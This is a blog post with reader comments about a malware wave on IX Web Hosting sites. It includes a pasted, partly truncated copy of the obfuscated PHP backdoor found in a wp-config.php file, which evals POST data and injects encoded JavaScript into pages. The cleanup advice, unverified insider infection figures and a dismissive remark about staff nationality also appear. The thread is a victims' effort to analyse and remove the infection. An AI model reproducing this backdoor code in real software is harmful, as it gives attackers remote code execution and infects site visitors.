A lot of the information I post here, I get from a person that works for IX Web Hosting and / or Ecommerce, as you all understand I cannot give any details that could compromise his / her position. I will call this person “AGENT IX”
Today I recieved an Email from “AGENT IX” that states that more than 100,000 IX Web Hosting Sites are infected.
The Details are, that IX Web Hosting is hosting 285,223 websites ( source http://whois.domaintools.com/ixwebhosting.com
More than 100,000 sites are infected, which means that more than 1/3 of all IX Web Hosting sites are infected!!
and IX has still not got a clue how to stop these attacks.
Also the injected script(s) are changing ( see previous posts) which most likely means that this vulnerability is now being exploited by various people / groups, and this also means that this problem is going to get a lot worse before it gets better, this problem has now been effecting sites since last year May ( 2008 ) almost 9 MONTHS LATER the problem is worse than it has ever been, and there is no bright light at the end of the tunnel yet.
IX Web Hosting Warning 
I also made the mistake of hosting with IX. One of my WordPress (WPMU v2.7) blogs was recently infected with the so called “Yahoo! Counter” virus. I wasted an entire afternoon looking for the code which is encrypted in base 64 to avoid detection when searching with terms like “Yahoo”
I finally found the code at the very end of my wp-config.php file (compare to wp-config-sample.php if you have it). This file had 755 permissions.
@neverixweb: Could you mention this in a post? I couldn’t find a clear fix for wordpress users on Google so I thought I’d contribute mine.
Hi Eric.
Thanks for taking the time to post about your issue, and the where abouts of the injected script.
It is true that the script is Base64 coded, could you post your code here if you still have it, and could you please let me know on what servers your site(s) are hosted.
Good Luck with your sites.
Here’s the code:
<?php if(!function_exists(‘tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2Yoe
WFob29fY291bn
RlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCcvJTJGJTNDJCU2NCU2OSU3NiUyMCU3MyU3NHx5JTZDZSE9JTY0aSU3
M3AlNkMmYXx5JTNBIW4lNkZuJTY1QCUzRVxuI2RAJTZGYyU3NW0lNjUjbnQkJTJFJTc3JTcyJTY5fHQlNjUoISUyMiElM0
MvfCU3NCU2NSMlNzgjdHxhciU2NSYlNjElM0UiQCUyOSE7fnZhciUyMGlgJTJDX34sfmE9JCU1QiYlMjIlMzdAOEAuJTMxMWAw
JTJFITEmNzUuJCUzMiUzMSUyMiYlMkMiJTMxJTM5fjV+LjIlMzRgLiUzNzZgLiUzMjVAJTMxfCIlNURgJTNCXyUzRCUzMXw7a
WYlMjh+ZG9jQCU3NUBtZSZudH4lMkVjbyQlNkYlNkIlNjlgZX4lMkV+bSU2MSF0fiU2M0BoJiUyOCQlMkZ+JTVDYiQlNjhg
Z34lNjZ8dH49IzEvJTI5QD09ISU2RX4lNzVsJTZDJTI5ZiU2RmAlNzIlMjgmJTY5PUAwfjskJTY5IyUzQyEyQCUzQmBpJTJ
CJTJCKUAlNjRgb2BjISU3NW1+JTY1biU3NCMlMkV+d3J+aSF0fiU2NXwlMjgjJTIyJCUzQyU3MyU2M35yJTY5IyU3MGAlNz
RAJTNFJCU2OSZmJCUyOCU1RiMlMjlkQCU2RiQlNjMmdUBtJTY1JTZFdC5gJTc3IXIlNjklNzRAJTY1QCgmJTVDfiUyMiUzQy
U3MyZjfHIlNjlwdCUyMCU2OSU2NCUzRGAlNUZgIitpIyUyQiUyMn4lNUYlMjBgc0AlNzIlNjMmPSQlMkZgLyEiKyU2MSU1Qnwl
NjklNUQlMkIlMjIlMkYjY3AlMkY/Iit+bmEmdmlnJTYxI3RvJTcyJTJFJTYxJTcwcGBOYXxtZWAuJTYzJTY4YGEkJTcyISU0MX
QoJTMwJTI5KyElMjJgJTNFJTNDJTVDJTVDfiUyRnMlNjMhcml+cCU3NCElM0UhJTVDJCUyMiYlMjklM0N8JTVDISUyRiU3M3
wlNjMlNzJpcCQlNzQlM0UlMjIlMjlgOyFcbi8lMkYlM0MvISU2NCU2OSZ2JiUzRScpLnJlcGxhY2UoL2B8XCZ8XCR8I3xcIXxcf
Hx+fEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg==’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\’\”][^\s\’\”\.,;\?!\[\]:/\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(base64_decode(‘IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==’),”,$s);if(stristr($s,'</body’))$s=preg_replace(‘#(\s*</body)#mi’,str_replace(‘\$’,’\\\$’,TMP_XHGFJOKL).’\1′,$s1);elseif(($s1!=$s)||defined(‘PMT_knghjg’)||stristr($s,'<body’)||stristr($s,”))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i
My sites run on the server block with mysql address mysql501.ixwebhosting.com. As a note, this is part of the new server block that runs php5.
How to get rid of the tmp_lkojfghx Virus
(for want of a better name)
I battled this virus for a couple of months. It infected around a dozen of my websites and I think I understand how it operates and how to prevent it from spreading.
Overview.
This virus is a multi pronged attack on websites and computers.
When you visit an infected site your PC may become infected. Your infected PC may be compromised with Spyware thus sending off FTP access information to the hackers. Hackers then use brute force to hack your password (if they don’t already have it). Your password and username is then used to hack your sites which then become malware sites and spread the virus further. Your site may even become blacklisted by Google and other sites.
The Hackers Methods
My opinion is that they infect your computer when you hit an infected site. The infection is some kind of spyware (or keylogging) which extracts FTP info from your browser. Probably the username. They then hack the password using brute force.
The Website Attack
A malicious (but valid) login using FTP access rewrites many of your website files. (check your FTP logs and align the times with your file dates and times)
1. PHP files will have malicious PHP script inserted at the start of the file bracketed by it’s own php tags. The original script is still present but is effectively disabled.
These PHP files when accessed from the public domain will do one of two things:-
They will firstly check for a variable sent by the POST method. This will be malicious code sent by the hacker and could vary each time.
If no variable is present they will proceed to infect or re-infect the rest of the HTML files in your site.
2. HTML files will have malicious JAVASCRIPT inserted between the and tags. When this page is accessed from the public domain it proceeds to download malware into the visitor’s PC (possibly from some remote site). It will sometimes ask you to click to download a Microsoft addon for this site. The computer then experiences a lot of disk activity and browser lockup. (information may be extracted at this point but I’m not sure)
Infected computers can slow down, experience browser hijacking and are probably infected with a keylogging virus or some other sort of spyware.
3. Javascript files (ending in .js) will have the same script as the HTML files inserted at the end of the file. These JS files are linked to html pages and thus have the same effect as being inserted directly in the html page.
You can clean up the site but it will be attacked again in a few days and re-infected.
Symptoms
•Your web pages are slow loading…possibly while the malicious code communicates with it’s master
•When you visit the site, your computer starts frantic disk activity and browser locks up (I suggest hit the reset button and used System Restore at this stage)
•A bar at the top of the page prompts you to download a Microsoft Add-on
If your PC is compromised it may display the following symptoms
•Computer has generally slowed down
•You experience browser hijacking especially ‘search engine’ redirection
•Other websites that you manage start to get infected
Cure
1. Change your FTP login to a VERY STRONG PASSWORD – for example 14 characters with a mix of symbols included (use a clean pc that is not compromised) My experience is that simple passwords will get hacked again. Complex passwords will not.
2. Meticulously clean out all traces of the virus from your website by reloading pages or editing out the hack code. Check hidden directories for infected files. These may not show using your FTP client (go to the CPanel File Manager and have a look)
3. Cleanse your PC
•Scan with your virus protection software (mine didn’t find it)
•Use System Restore to revert back to before you got infected (this is the best way I have found)
•Reformat your disk, reload windows and spend a couple of days reloading your PC
*Ensure that System Restore is Enabled on your PC
I also hosted with IX and late last year they sent me a notification that a) my ftp password had been compromised and b) my site was now infected.
After they apparently ‘cleaned’ my site, I no longer trusted the host. I switched to another company and abandoned IX. This morning I get an email from IX advising my FTP pw has been compromised yet again. AT THE SAME TIME my FTP pw was hacked via my new host, even though they are completely unrelated. I’m not majorly technical, but could it be an ‘inside job’ at IX? Just a thought…
I am recent to the woes of IX Web Hosting. They are making it very difficult for me. I came into a position where I needed to work on our company Web Site. Now every time I update any of the pages, the next day it says that my FTP password has been compromised. After asking multiple times for a copy of the times and IPs all I get is a file showing the previous day and my IP address logging in. According to them, they had just recycled their files. I cannot get a straight answer from any of the Russians they have working for them besides I need to put in another ticket. In the 2 months I have been working with them, I have had to change my FTP password 9 times. I have a clean machine, rebuilt from scratch. I install Filezilla I install my web editor. I design a page. I upload. Bam! next day. Your FTP Password has been compromised. IXWEBHOSTING Sucks Hard! As soon as they give me their cancellation/refund policy info I will be bringing it to my boss and switching to Domain.com. Also the site was hacked before I started on this project multiple times. It was hit with redirects to Porn. Great security on their end huh? So if you or anyone you know uses IX let them know to run…get away while they can.